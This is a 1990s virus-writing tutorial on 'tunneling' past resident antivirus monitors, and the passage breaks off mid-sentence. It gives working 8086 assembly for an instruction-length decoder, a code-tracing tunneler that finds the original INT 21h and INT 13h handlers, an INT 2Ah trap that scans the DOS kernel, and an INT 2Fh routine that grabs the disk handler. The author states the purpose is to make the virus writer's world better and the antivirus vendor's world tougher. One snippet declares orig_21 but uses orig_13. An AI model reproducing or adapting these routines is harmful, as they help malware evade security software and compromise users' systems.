Tutorials - Tunneling Via Mini-Tunnelers

Tunneling
via
Mini-Tunnelers
    .-----------.
    | The curse |
    '-----------'
    This document has been sealed by an evil, ancient egyption curse... anyone
reading this text may have their flesh liquify and drip off their bones.  Hey,
don't let some bothersome flesh-dripping stop you from reading this document,
the curse only applies if you haven't read the first two documents in my series
on tunneling, the ones before this one, which is the third.  Of course, if you
-HAVEN'T- read the first two, which cover single stepping and code tracing...
well then... you better get reading, don't you think?

    .--------------.
    | Introduction |
    '--------------'
    So, you think you are an ace, and you are beginning to wonder what this
third document could possible be about, since you think you know everything
there is to tunneling already.  As if single stepping and the primitive form of
code tracer I taught you to code... is all there is in the world of tunneling.

    Yes human, it is time to face the facts, you are only halfway along the
road of tunneling genius, in need to progress past your pathetic self
destructive existence as a human being, into the higher realm of extra
terrestrial intelligence.

    What can you learn from extra terrestrials?  How about a form of complex
mask table and decoder that compile to HALF THE SIZE OF THE OLD ONES, and can
-ALSO- be used in emulation systems?  How about a new code tracing engine that
actually works as well as being smaller than the old one, as WELL as using the
new CMT format as WELL as having commented source code that even -YOU- could
understand?!?!  How about i2a trapping, i20 and CP/M exploitation, and kernel
scanning?  All those and more await you in this document!

    In an effort to make the world of the virus writer a better place, and to
make the world of the AV a little tougher, I have struck up a deal with the
aliens which allows me to release these tunneling concepts to the general
public.  In trade, I've had to help them with the coding of code emulation
tunneling systems... mwahahaha.

-----------------------------------------------------------------------------
Section 1:  Complex Mask Tables v2.0
-----------------------------------------------------------------------------
    Yes, complex mask tables are back, and they, with the help of the higher
beings, are even better than before!  After having many talks with the aliens,
a new structure for CMT tables was created, as well as a new format for the CMT
entries themselves.  We also created a new CMT decoder system, and increased
the functionality of the CMT system to allow rudimentary handling of emulation
systems!

    However, before we go into the new CMT format, there's something you need
to know.  Do you remember my code tracer from document #2... which never seemed
to work on anyone's system except mine, and even then, not very often?  Well, I
can now tell you, that this is NOT a problem with code tracing, it was simply
because of a bug in CMT's!!!!

    That's right, you can throw the old version of CMT's out of the window, the
old example tables I created are absolutely useless, chock full of bugs so
chumpy you could carve them.  Of course, I didn't realise this until I began
work on beta copies of 8086 emulation systems... which led to the creation of
the new form of CMT's you're about to see.  Basically, although the old CMT
design was good in theory, the example tables you saw (the big list of 1's and
0's) were all wrong.

    How can I say that these typographical errors won't crop up again?  Well, I
can't.  However, I -CAN- tell you that the new CMT 2.0 format reduces the risk
of errors such as the ones I made... but it comes with alot of other features
as well that make them superior to the old format... which you'll learn about
as we go along.  Anyway, enough self-congratulatory text... here's the design
structure of the new CMT 2.0 format.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

    Layout of table entry:   Size    Description
                            '----'  '-----------'
                             byte    Field descriptor byte
                             byte    MASK
                             word    Handling routine if needed
                             byte    CMP value

    Field descriptor byte:   |x|6|5|4|3|2|1|0|
                             | | | | | |     |
                             '-'-'-'-'-'-----'
                                | | | |   '----------------.
                                | | | |                    ^
                                | | | |   Length of instruction OR the number
                                | | | |   to add to instruction length after
             .------------------' | | |   the other decodings
             ^                    | | '--------------------.
  0 = Don't use last bitfields    | |                      ^
  1 = Use last bitfields          | |     0 = Don't use MODR/M routines
                                  | |     1 = Use MODR/M routines
             .--------------------' '----------------------.
             ^                                             ^
  0 = Last bitfields are xxxxxxxX            0 = Opcode is not special
  1 = Last bitfields are xxxxxxXX            1 = Opcode needs special handler

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    That's the new design specifications... they look a little daunting at
first but you'll get used to them :)  They are actually so much easier to use
than the CMT 1.0 format.  Anyway, before I go into how these tables operate,
I'll discuss what some of the major changes between CMT formats 1.0 and 2.0
are, and why I made them.

    First of all, in the CMT 1.0 format, it was annoying to me that the decoder
needed to handle two different types of table entry, word sized and byte sized,
making the decoder twice the size it should have been.  As such, I took out the
word size entries for the CMT 2.0 format.  Also, the new CMT 2.0 format doesn't
have to handle multiple CMP values per MASK... which also decreases decoder
size and complexity greatly.

    Finally, the biggest change was how the CMT method actually works.  Before,
you had to pre-calculate the length of every variation of instruction... which
would lead to hard to track down bugs when you type a 1 instead of a 0 in the
tables by accident.  To combat this, in the new CMT 2.0 format, the decoder
actually calculates the length of instructions on the fly!  Of course you still
have to enter opcode information, but whats needed now is nothing compared to
what was needed before.

    Opcode length can generally be determined by putting an opcode through 4
phases, each which add to the total opcode length along the way.  However, all
the opcodes only have to go through certain combinations of phases, hence the
table entries, which tell the decoder which phases the opcode needs to go
through to calculate the full instruction length.

    The first 2 phases are for special opcodes with immediate data following
them.  These opcodes specify wether the immediate data following is a byte or
word by using the last bit of their opcode... if it is clear, then immediate
byte data follows, and if it is set, immediate word data follows.  Some
instructions use the last TWO bits to specify immediate data length just as
before, and handling these is the second phase of the decoder.  Which of these
phases, if any, an opcode needs to go through are marked by the 5th and 6th
bits in the field descriptor byte.  The bit/data ratios are as follows:

        00 = byte immediate follows instruction
        01 = word immediate follows instruction
        10 = byte immediate follows instruction
        11 = byte immediate follows instruction

    The third decoder phase is MODR/M handling.  Many opcodes are in a set
structure called the MODR/M format.  These instructions can have part of their
length determined by the same MODR/M routine.  If the 3rd bit is set in the
field descriptor byte, the CMT decoder passes the opcode through its MODR/M
handler to calculate part of the instruction length.

    The fourth decoder phase is the addition to the current instruction length
(as built up by the past 3 phases), of the number countained in last 3 bits of
the field descriptor byte.  The reason for this is that sometimes, instructions
are a fixed length and don't need to go through any of the other 3 phases... so
you just set the field descriptor byte to not go through any of the phases and
set the last 3 bits to the full instruction length.  Also, some instructions
need a constant number to be added to their length once other decodings have
been completed to get the full instruction length.  If an instruction doesn't
need any more values added to it, such as if it is just a straight MODR/M
instruction, the last 3 bitfields can be set to zero, nulling the effect of the
4th phase.

    Oh, and there is one more thing I haven't mentioned yet... the special
opcode flag.  The special opcode flag was designed for usage in emulation
systems, however it can allow small space savings in code tracers as well.  As
you may remember from the code tracer in document #2, we had to strain off many
opcodes before they reached the CMT tables, using dedicated routines to handle
them.  Examples of these opcodes are segment override prefixes, JMP and CALL
instructions, etc.

    To do this, we generally had to mask the opcode and compare the result
against the signature of the opcode we are checking for, jumping to the special
handling routine if we get a match.  However, this is basically exactly what
CMT tables were designed for, masking and comparing.  With the new CMT 2.0
format, the decoder can return to you an address you need to call for special
opcodes, reducing the size of your code tracing engines as there is no longer a
need for long drawn out sets of PUSH/AND/CMP/POP/JE... this should also make
your source code alot more readable.

    Are there any disadvantages in the new CMT 2.0 format?  Well, only one, in
that they -CANNOT- handle any 286 or higher opcodes.  This problem will be
handled in the CMT 3.0 definition, which is currently in the works for a later
document.  Until document #4 when the CMT 3.0 definition is released, this
table definition should last you for quite a while.  Time to see the CMT 2.0
instruction database.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

instruction_struc struc

    ; AAA/AAS/DAA/DAS
    db 00000001b
    db 11100111b
    db 00100111b

    ; AAD/AAM
    db 00000010b
    db 11111110b
    db 11010100b

    ; BOUND
    db 00001000b
    db 11111111b
    db 01100010b

    ; CBW/CWD/POPF/PUSHF/SAHF/LAHF/WAIT/CALL FAR OFF:SEG
    ; XCHG accumulator with register
    db 00000001b
    db 11110000b
    db 10010000b

    ; CLD/STD/CMC/HLT
    db 00000001b
    db 11110110b
    db 11110100b

    ; CLI/STI/CLC/STC
    db 00000001b
    db 11111100b
    db 11111000b

    ; CS/DS/ES/SS overrides
    db 00010001b
    db 11100111b
    dw tracer_override
    db 00100110b

    ; JMP conditional
    db 00010010b
    db 11110000b
    dw tracer_conditional_jump
    db 01110000b

    ; JMP short
    db 00010010b
    db 11111111b
    dw tracer_jmp_short
    db 11101011b

    ; LOCK/REP[N[E]]
    db 00000001b
    db 11111100b
    db 11110000b

    ; CMPS/MOVS/LODS/SCAS
    db 00000001b
    db 11110100b
    db 10100100b

    ; DEC|INC|PUSH|POP register
    db 00000001b
    db 11100000b
    db 01000000b

    ; INT 3 | INTO
    db 00000001b
    db 11111101b
    db 11001100b

    ; IRET
    db 00010000b
    db 11111111b
    dw tracer_ret_far
    db 11001111b

    ; RETN|F
    db 00010000b
    db 11110110b
    dw tracer_ret_far
    db 11000010b

    ; INT variable
    db 00000010b
    db 11111111b
    db 11001101b

    ; PUSH|POP segment register
    db 00000001b
    db 11100110b
    db 00000110b

    ; ENTER
    db 00000100b
    db 11111111b
    db 11001000b

    ; LEAVE
    db 00000001b
    db 11111111b
    db 11001001b

    ; LOOP series and JCXZ
    db 00010010b
    db 11111100b
    dw tracer_jmp_short
    db 11100000b

    ; XCHG/TEST/LEA/POP register/memory
    ; MOV segment register with register/memory
    db 00001000b
    db 11110100b
    db 10000100b

    ; PUSHA and POPA
    db 00000001b
    db 11111110b
    db 01100000b

    ; IN/OUT variable port
    db 00000001b
    db 11111100b
    db 11101100b

    ; IN/OUT fixed port
    db 00000010b
    db 11111100b
    db 11100100b

    ; STOS
    db 00000001b
    db 11111110b
    db 10101010b

    ; XLAT
    db 00000001b
    db 11111111b
    db 11010111b

    ; ESC
    db 00001000b
    db 11111000b
    db 11011000b

    ; LDS/LES
    db 00001000b
    db 11111110b
    db 11000100b

    ; MOV register/memory with register
    db 00001000b
    db 11111100b
    db 10001000b

    ; MOV memory with accumulator
    db 00000011b
    db 11111100b
    db 10100000b

    ; MOV register with immediate byte
    db 00000010b
    db 11111000b
    db 10110000b

    ; MOV register with immediate word
    db 00000011b
    db 11111000b
    db 10111000b

    ; TEST accumulator with immediate
    db 01000001b
    db 11111110b
    db 10101000b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR register/memory with register
    db 00001000b
    db 11000100b
    db 00000000b

    ; RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL register/memory with 1 or CL
    db 00001000b
    db 11111100b
    db 11010000b

    ; RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL register/memory with immediate
    db 00001001b
    db 11111110b
    db 11000000b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR register/memory with immediate
    db 01101000b
    db 11111100b
    db 10000000b

    ; MOV register/memory with immediate
    db 01001000b
    db 11111110b
    db 11000110b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR accumulator with immediate
    db 01000001b
    db 11000110b
    db 00000100b

; F6 - test, ???, not, neg, mul, imul, div, idiv  b's
; F7 - test, ???, not, neg, mul, imul, div, idiv  w's
; FE - inc, dec, callin, callif, jmpin, jmpif, push, ???
; FF - inc, dec, callin, callif, jmpin, jmpif, push, ???
; Note that the TEST instruction is handled incorrectly in here, but properly
; fixed up in the CMT decoder
;
    db 00011000b
    db 11110110b
    dw tracer_indirect
    db 11110110b

    end_of_table equ $
    ends

instruction_table instruction_struc <>
                            ; our new complex mask table

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    As you can see, the database for the CMT 2.0 format looks alot cleaner and
uncluttered than the ones presented in document #2 for the CMT 1.0 format.  But
this cleaner look is not only pleasing to the eye, it has the added advantage
of being easier to read, so you can add entries and check for bugs alot easier
than in the CMT 1.0 database.  So, now that you have the example table and
formal definition, it is time to show you the new and improved CMT 2.0
decoder!

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

; Registers modified: AX, BX, CX, DX, SI, BP
; Requires:           AX holds opcode to scan through table
;                     Segment of CMT database in DS
; Returns on failure: BL=1
; Returns on success: BL=0
;                     AX=instruction length
;                     BP=address to give control to if dedicated routine
;                        needed, or 0 if no dedicated routine needed
;
decoder proc near
        lea si, [instruction_table-1]
        mov dx, ax                      ; DX holds the virgin opcode through
                                        ; the entire routine
decoder_main:
        xor bp, bp
        inc si
        cmp si, offset instruction_table.end_of_table
        jne decoder_valid       ; make sure we don't go off past the
                                        ; end of the table
decoder_invalid:
        mov bl, 1                       ; BL = failure code
        ret                             ; exit decoder

decoder_valid:
        mov ax, dx                      ; reload AX with current opcode
        mov bl, ds:[si]                 ; get status word in BL
        mov bh, bl                      ; make a copy
        and al, ds:[si+1]               ; mask opcode against table entry
        inc si
        inc si
        test bl, 10000b
        je decoder_not_special          ; no special routine needed
        mov bp, ds:[si]                 ; grab routine address
        inc si
        inc si                          ; adjust DS:SI pointer
decoder_not_special:
        cmp al, ds:[si]                 ; check masked opcode against CMP value
        jne decoder_main                ; no match, so restart with next entry

        ; there is a bug in my tables which makes it so you have to set a
        ; bit in the field descriptor byte if a TEST B/TEST W instruction is
        ; encountered
        mov ax, dx
        and ax, 11100011111110b
        cmp ax, 00000011110110b
        jne decoder_notest
        or bh, 1000000b

decoder_notest:
        ; now we need to work out the opcode length... using the status bits
        ; still held intact in BH (our BL copy was destroyed earlier)... note
        ; that CL holds the end instruction length throughout this section

        ; first we need the beginning length of the instruction
        mov al, bh
        and al, 111b
        mov cl, al                      ; this is added/used as instruction
                                        ; length no matter what the rest of the
                                        ; bitfields say

        ; next we handle the 'last bitfields' section
        mov al, bh
        and al, 1000000b
        jz decoder_nobits       ; we're not supposed to use the bits

        mov ax, dx                      ; get current opcode back
        and al, 1
        inc al
        add cl, al                      ; increase accordingly
        mov al, bh
        and al, 100000b
        jz decoder_nobits
        mov ax, dx                      ; get current opcode back
        and al, 11b
        cmp al, 11b
        jne decoder_nobits
        dec cl                          ; decrease accordingly

decoder_nobits:
        ; now that we have the beginning length, we check to see if this
        ; entry uses MODR/M
        mov al, bh
        and al, 1000b
        jz decoder_nomodrm

        ; if we do use MODR/M... the shit really hits the fan here
        add cl, 2                       ; we add 2 by default since the opcode
                                        ; is at least 2 bytes long (identifier
                                        ; plus MODR/M byte)
        mov ax, dx                      ; get current opcode back
        and ah, 11000111b
        cmp ah, 110b
        je decoder_add_two      ; we just add 2 for straight memory access
        and ah, 11000000b
        jz decoder_nomodrm      ; we add nothing
        cmp ah, 01000000b
        je decoder_add_one      ; we just add a byte displacement here
        cmp ah, 11000000b
        je decoder_nomodrm      ; we add nothing here either

decoder_add_two:
        inc cl
decoder_add_one:
        inc cl
decoder_nomodrm:
        mov ch, 0
        mov ax, cx                      ; AX = instruction length
        mov bl, 0                       ; BL = success
        ret                             ; leave decoder
decoder endp

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    Once again, the new decoder is much more efficient than the last one, and
is also alot smaller and easier to understand as well ;)  Of course, it also
has the advantage that it works with the CMT 2.0 format, hehehe, and being
easier to understand is probably just because I actually commented it and set
the source out nicely (well, compared to the CMT 1.0 decoder at least, heh).

    Anyway, being the bloodsucking assho... uuuh, I mean, inquisitive human
being that you are... you are probably wanting to see some results on how the
new tables work.  What better way to show you than with a new code tracer
module that you can test for yourself?  This new version takes full advantage
of the features of the CMT 2.0 format, while fixing up a few bugs in the old
decoder.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

override       db 02eh  ; current segment override
loop_counter   dw 0300h ; local abort counter
global_counter dw 0     ; global abort counter
temp_ip        dw 0     ; temporary storage for stack searching
temp_store     dw 0, 0  ; temporary storage for stack searching
stack_top      dw 0     ; do not POP past this point
stack_bottom   dw 0     ; do not PUSH past this point

tracer proc near
    push cs
    pop ds
    mov ds:[stack_top], sp          ; setup stack
    mov ax, offset program_end+40h  ; smaller than lea ax, [program_end+40h]
    mov ds:[stack_bottom], ax       ; assuming we're running from a COM file,
                                    ; we shouldn't push past this point
    mov ax, 03521h
    int 021h                ; get i21 address
    xchg bx, di             ; into ES:DI
    push ax
    push ax
    push ax                 ; fixup stack (push fake CALL)
tracer_begin:
    mov ds:[override], 02eh ; clear overrides
tracer_skip_prefix:
    xor si, si
    mov ax, es
    cmp ax, ds:[first_mcb]
    jb tracer_success       ; check for DOS segment
    dec ds:[loop_counter]
    jz tracer_ret_far       ; do another path if this path has led nowhere
    dec ds:[global_counter]
    jz tracer_error         ; exit if too many global passes
    cmp di, 0fff0h
    jb check_opcode         ; everything is okay, handle opcodes
tracer_ret_far:             ; do another path as this has gone too long
    mov ax, sp
    add ax, 6
    cmp ax, ds:[stack_top]
    jae tracer_error        ; make sure we don't pop too much off the stack
    pop di
    pop es
    pop ds:[loop_counter]
    jmp tracer_begin        ; do RETF and return to main handler

tracer_error:
    inc si
tracer_success:
    mov sp, ds:[stack_top]
    ret                     ; exit tunneler

tracer_override:
    mov bl, es:[di]
    mov ds:[override], bl
    add di, ax
    jmp tracer_skip_prefix  ; handles segment overrides

tracer_conditional_jump:
    mov ax, di
    inc ax
    inc ax
    call tracer_call_finish ; push address after conditional jump onto the
                            ; stack
tracer_jmp_short:
    mov al, es:[di+1]
    cbw
    add di, ax
    inc di
    inc di
    jmp tracer_begin        ; do jump short and return to trace

tracer_indirect:
    xchg ax, bx             ; save opcode length
    mov ax, es:[di]
    cmp al, 0feh
    jb tracer_not_indirect  ; make sure it's within the right range
    and ah, 11000111b
    mov cl, ah              ; save MODR/M information, if there is an indirect
                            ; reference then CX!=110
    cmp ds:[override], 2eh
    je tracer_indirect_next
    inc cx                  ; sets CX!=0 if a non-CS override encountered
tracer_indirect_next:
    mov ax, es:[di]
    and ah, 111000b
    cmp ah, 10000b
    je tracer_call_near_mem ; CALL [X]
    cmp ah, 11000b
    je tracer_call_far_mem  ; CALL FAR [X]
    cmp ah, 100000b
    je tracer_jmp_near_mem  ; JMP [X]
    cmp ah, 101000b
    je tracer_jmp_far_mem   ; JMP FAR [X]

tracer_not_indirect:
    xchg bx, ax             ; restore opcode length
    jmp generic_opcode      ; it's a normal opcode so handle it normally

check_opcode:
    mov ax, es:[di]
        ; although the following opcode checks could be in the CMT, it is
        ; smaller to handle them directly
    cmp al, 0e9h
    je tracer_jmp_near_immed    ; JMP WORD PTR X
    cmp al, 0eah
    je tracer_jmp_far_immed     ; JMP DWORD PTR X:X
    cmp al, 0e8h
    je tracer_call_near_immed   ; CALL WORD PTR X
    cmp al, 9ah
    je tracer_call_far_immed    ; CALL DWORD PTR X:X
    push si
    call decoder                ; get length of opcode in AX... destroys SI
    pop si                      ; which is why we save/restore it
    cmp bl, 1
    je _tracer_ret_far          ; follow another path if invalid opcode found
    cmp bp, 0
    je generic_opcode           ; handle like a normal opcode
    jmp bp                      ; use a dedicated procedure for this opcode
generic_opcode:
    add di, ax                  ; DI=DI+Opcode Length
    jmp tracer_begin            ; resume tracing

tracer_call_near_mem:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 4
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_near_mem:
    cmp cl, 110b                ; exit if indirect memory access
    jne _tracer_ret_far
    mov di, es:[di+2]
    mov di, es:[di]
    jmp tracer_begin            ; resume tracing

tracer_call_far_mem:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 5
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_far_mem:
    cmp cl, 110b                ; exit if indirect memory access
    jne _tracer_ret_far
    mov di, es:[di+2]
    mov ax, es:[di+2]
    mov di, es:[di]
    mov es, ax
    jmp tracer_begin            ; resume tracing

tracer_call_near_immed:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 3
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_near_immed:
    add di, es:[di+1]
    add di, 3
    jmp tracer_begin            ; resume tracing

tracer_call_far_immed:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 5
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_far_immed:
    mov ax, es:[di+3]
    mov di, es:[di+1]
    mov es, ax
    jmp tracer_begin            ; resume tracing

_tracer_ret_far:                ; so short jumps can
    jmp tracer_ret_far          ; jump to tracer_ret_far
_tracer_error:                  ; so short jumps can
    jmp tracer_error            ; jump to tracer_error

; if you are going to push 6 values (CS, IP, COUNTER) onto the stack, then this
; routine makes sure the stack doesn't overflow... if it would overflow, then
; the tracer aborts
tracer_call_setup:
    pop bx
    mov ax, sp
    sub ax, 6                   ; AX=what SP will be after push's
    cmp ax, ds:[stack_bottom]
    jbe _tracer_error           ; abort if stack goes past limits
    mov ax, di
    push bx
    ret

; this routine scans the stack for the address you are wanting to push onto
; it... if it is not on there, the routine adds it to the stack, otherwise
; it performs a RET FAR
tracer_call_finish:
    pop ds:[temp_ip]            ; keeps the stack clear
    mov ds:[temp_store], ax
    mov ds:[temp_store+2], es   ; save ES and AX which are modified in the
                                ; routine
    push ss
    pop es
    xchg bp, di                 ; save DI
    mov di, sp                  ; ES:DI == SS:SP
tracer_call_loop:
    mov ax, es:[di]
    cmp ax, ds:[temp_store]
    jne tracer_call_nomatch     ; jump if IP!=SS:[SP]
    mov ax, es:[di+2]
    cmp ax, ds:[temp_store+2]
    je _tracer_ret_far          ; do RET FAR if CS:IP==SS:[SP]
tracer_call_nomatch:
    add di, 6
    cmp di, ds:[stack_top]
    jb tracer_call_loop         ; loop until the stack is exhausted
tracer_call_exit:
    push ds:[loop_counter]      ; push loop counter onto stack
    mov ax, ds:[temp_store+2]
    push ax                     ; push CS onto stack
    push ds:[temp_store]        ; push IP onto stack
    push ds:[temp_ip]           ; set return IP on stack
    mov es, ax
    xchg bp, di                 ; restore ES:DI (CS:IP)
    ret                         ; return to caller
tracer endp

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    So how well does it work?  Well, in theory, since it is using a practically
bug free instruction database, and since it can handle 186 instructions now, it
should have increased chances of tunneling interrupts properly, unless 286/386
opcodes are encountered, in which case it may sometimes go haywire, and
sometimes it will not be hampered at all.  In practice, on my system it can
tunnel i21 past combinations of QEMM/TBAV/DESQVIEW/TD/S-ICE, so at least for ME
it's stable.

    As for tunneling i13, well, I've got it to half work :)  Unlike the first
version in document #2, it can now tunnel i13 past SMARTDRV by skipping the 386
opcode path and taking another path with no such opcodes.  The original version
was supposed to do this as well, but didn't due to a bug :)  Even if the bug
wasn't there, it still wouldn't have worked due to the buggy CMT tables.  Win95
does not use SMARTDRV I don't think, so I suppose my bugfix is redundant anyway
since alot of people run Win95 :)

    Although it will generally tunnel i13 okay under normal systems... DESQView
is a totally different pot of cheese.  Under DESQView, the tunneler hangs the
computer for about 6 seconds before returning an abort code.  The DESQView i13
code is a MESS of conditional jumps and calls, which is somehow screwing up
the internal logic of the code tracer.  Sigh.

    Also, you can use the code tracing engine to tunnel the i20 handler, which
eventually leads to the the i21 handler.  The reason why is, whatever program
has trapped i20, it simply changes AX to 0000 and then chains to the i21
handler.  DESQView, TBAV, and even DOS itself do this.  HOWEVER, if TBAV or
DESQView isn't loaded, then DOS gets control first, and its conversion from
i20-i21 procedure is a few bytes below/above the i21 procedure itself in the
DOS kernel... which means the code tracer will think the second it reaches the
DOS kernel, that it has found the i21 entrypoint, when it is a few instructions
away.  Sigh.  You can get around this by checking ES:DI each pass for the
signature of the DOS kernel entrypoint, (which is CLI/CMP/JZ/CMP/JZ/etc, you'll
read more about it through the document), instead of checking if the current
segment is below the first MCB.  Apart from that, the routine tunnels through
the TBAV/DESQView code properly every time, reaching the correct i21 address.

    In short, the results of the new code tracing engine are impressive, as it
is very successfull in tunneling i21, i20, and i13, unless DESQView is running,
in which case the i13 tunneler doesn't work.  Of course, the only improvements
weren't in how well the code tracer works... I also strove to decrease size
requirements as well:

         .---------------------------.-------.-------.-------------.
         | Module                    | CT #1 | CT #2 | Space saved |
         .---------------------------.-------.-------.-------------.
         | CMT decoder               | 216 b | 135 b |   81 bytes  |
         | CMT instruction database  | 253 b | 134 b |  119 bytes  |
         | Code Tracing Engine       | 528 b | 404 b |  124 bytes  |
         .---------------------------.-------.-------.-------------.
         | Total                     | 997 b | 673 b |  324 bytes  |
         '---------------------------'-------'-------'-------------'

    So as you can see, we've dropped 1/3 of the code in the code tracing engine
itself, as well as making our CMT tables and decoder nearly half the size of
the original versions, ending up with our new complete code package average
2/3's the size of the original... not too bad.  Of course, you could probably
still trim the code size down with some dirty optimizations.  By moving some of
the opcodes in the CMT instruction database inline into the code tracing
engine, like I have done with the jump/call direct access instructions, you
could probably save an extra 30 or so bytes.  But this document is about
tunneling, not how to optimize your code :)

-----------------------------------------------------------------------------
Section 2:  INT 2A trapping
-----------------------------------------------------------------------------
    i2A trapping was created many years ago, and as far as I know, at least 2
viruses use it... CHAOS-AD by Sepultura [IR/G], which was printed in IR#7, and
Assassin by Dark Slayer (of Taiwaan), which was printed in 40HEX.  I don't know
who created it first, but Sepultura has said that he created it independantly.

    .--------------.
    | How it works |
    '--------------'
    Inside the DOS kernel i21 handler, there is an INT 2A instruction, which is
executed near the end of DOS's processing of most of the different i21
functions.  Anyway, i2A generally points to an IRET, or networking code, or
some sneaky AV programs.  Sigh, I suppose sometimes DOS may hook it for its own
uses too, but I'm getting off the track.

    To tunnel i21, you simply hook i2A into your virus, and then, execute a DOS
i21 function.  The DOS kernel then calls i2A later on, transferring control to
your handler, with the CS:IP of the i2A call still on the stack. Then, you scan
through DOS's segment for the marker of an i21 kernel entrypoint (CLI/CMP AH/
etc), save the addresses, restore control to the proper i2A, and then on exit
from the i21 handler, you have the original i21 entrypoint.

    .---------.
    | Example |
    '---------'

orig_21 dw 0, 0
orig_2a dw 0, 0

tunneler proc near
    xor ax, ax
    mov ds, ax
    les ax, ds:[(02ah*4)]
    mov cs:[orig_2a], ax
    mov cs:[orig_2a+2], es      ; save old 2A handler
    cli
    mov word ptr ds:[(02ah*4)], offset new_2a_handler
    mov ds:[(02ah*4)+2], cs     ; write new handler
    sti
    mov ah, 052h
    int 021h                    ; execute any old INT 21 function
    les ax, dword ptr cs:[orig_2a]
    cli
    mov ds:[(02ah*4)], ax
    mov ds:[(02ah*4)+2], es     ; restore old handler
    sti
    ret                         ; exit routine
tunneler endp

new_2a_handler proc far
    push bp
    mov bp, sp
    push ax
    push es
    push di
    push cx                     ; save registers
    mov cx, -1
    les di, [bp+2]              ; set ES:DI to return address
    std                         ; scan backwards
    mov al, 0fah                ; 'CLI'

int_2a_loop:
    scasb
    je int_2a_scan_okay         ; exit if CLI found
    loop int_2a_loop            ; keep scanning
int_2a_scan_error:
    mov word ptr cs:[orig_21], 0
    mov word ptr cs:[orig_21+2], 0
    jmp exit_2a_handler         ; abort if no CLI in whole segment
int_2a_scan_okay:
    cmp word ptr es:[di+2], 0FC80h
    jne int_2a_loop
    inc di                      ; SCASB fixup
    mov cs:[orig_21], di
    mov cs:[orig_21+2], es      ; save CLI's CS:IP (ES:DI)
exit_2a_handler:
    mov ax, [bp+6]
    push ax
    popf                        ; restore proper flags
    pop cx
    pop di
    pop es
    pop ax
    pop bp                      ; restore modified registers
    jmp dword ptr cs:[orig_2a]  ; hand control back to original 2A handler
new_2a_handler endp

    .----------.
    | Problems |
    '----------'
    There are a few problems with i2A trapping, and kernel scanning (looking
for the CLI/CMP AH, XX/etc, signature).  There's a discussion on problems with
kernel scanning at the end of the document so you can look there for the
problems with it, in here we'll just discuss i2A specific problems.

    When DOS is in the HMA, your i2A trapper will always return the address of
the entrypoint in the HMA.  Now, we all know that the HMA can be, and is,
turned on and off at will by other programs, which means that sometimes, when
you call the original i21 in the HMA, the HMA won't be available and your virus
will crash the computer.

    Also, there are a few ways to specifically stop i2A trapping, all which
require you to be hooked into i21 yourself.  The easiest method, would be to,
in your handler, after executing the original i21, to call i2A again, and have
a fake CLI/CMP in your own segment to fake the DOS entrypoint signature.  This
may, however, cause some problems for programs which specifically hook into i2A
to handle specific tasks, etc, which may become confused.  A smarter method
would be to, on entry to i21, replace i2A with a null IRET handler, and then
execute the original i21, before returning the i2A to its proper value.  Once
again, this may cause problems with other programs which hook i2A for specific
tasks.

    .----------------------.
    | How does it size up? |
    '----------------------'
    Well, basically, anti-i2A code isn't really present in any commercial AV
TSR software.  However, there are the problems associated with the DOS kernel
scanning... such as network incompatability, etc, which you'll read about much
later in the document.  However, generally speaking, apart from the dos kernel
scanning problems, the routine seems to work pretty much okay on most systems
I've seen so far.

-----------------------------------------------------------------------------
Section 3:  Grabbing i13 from the DOS kernel
-----------------------------------------------------------------------------
    This backdoor was first seen in many of the bulgarian viruses from long ago
when Bulgaria was the virus writing capital of the world (well, supposedly
anyway).

    .-----------------------------.
    | The info (from Ralph Brown) |
    '-----------------------------'
INT 2F - DOS 3.2+ - SET DISK INTERRUPT HANDLER
        AH = 13h
        DS:DX -> interrupt handler disk driver calls on read/write
        ES:BX = address to restore INT 13 to on system halt (exit from root
                 shell) or warm boot (INT 19)
Return: DS:DX set by previous invocation of this function
        ES:BX set by previous invocation of this function
Notes:  IO.SYS hooks INT 13 and inserts one or more filters ahead of the
          original INT 13 handler.  The first is for disk change detection
          on floppy drives, the second is for tracking formatting calls and
          correcting DMA boundary errors, the third is for working around
          problems in a particular version of IBM's ROM BIOS
        before the first call, ES:BX points at the original BIOS INT 13; DS:DX
          also points there unless IO.SYS has installed a special filter for
          hard disk reads (on systems with model byte FCh and BIOS date
          "01/10/84" only), in which case it points at the special filter
        most DOS 3.2+ disk access is via the vector in DS:DX, although a few
          functions are still invoked via an INT 13 instruction

    .---------.
    | Example |
    '---------'
orig_21 dw 0, 0

grab_13 proc near
    mov ah, 013h
    int 02fh                    ; grab original i13 handler addresses
    push es
    push bx                     ; save address we want on the stack
    mov ah, 013h
    int 02fh                    ; restore original addresses (as they were
                                ; corrupted on the first call)
    pop bx
    pop es
    mov cs:[orig_13], bx
    mov cs:[orig_13+2], es      ; save original i13 address in a variable
    ret                         ; exit
grab_13 endp

    .------------.
    | Commentary |
    '------------'
    As you can already imagine, this method, although sounding fairly secure,
